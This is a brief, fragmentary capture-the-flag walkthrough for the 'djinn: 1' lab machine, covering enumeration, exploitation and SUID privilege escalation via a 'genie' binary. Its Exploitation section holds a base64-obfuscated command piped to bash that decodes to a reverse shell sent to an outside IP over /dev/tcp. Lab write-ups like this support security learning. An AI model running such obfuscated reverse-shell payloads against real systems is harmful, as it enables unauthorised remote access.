DJINN: 1 — Walkthrough

Level: Beginner-Intermediate

  • Level: Beginner-Intermediate
  • flags: user.txt and root.txt
  • Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
  • Format: Virtual Machine (Virtualbox — OVA)
  • Operating System: Linux
djinn: 1
This website uses 'cookies' to give you the best, most relevant experience. Using this website means you're happy with…

Enumeration

More Enumeration,


Exploitation

Let’s execute the command to bypass the injection,

echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTkyLjE2OC4xMDMuMTM0LzQyNDIgMDwmMSAyPiYx | base64 -d | bash


Privilege Escalation

now, we are nitish

we have a suid file named genie

  • looked through the strings output of genie
  • we can see that we have another parameter -cmd

same goes for /lago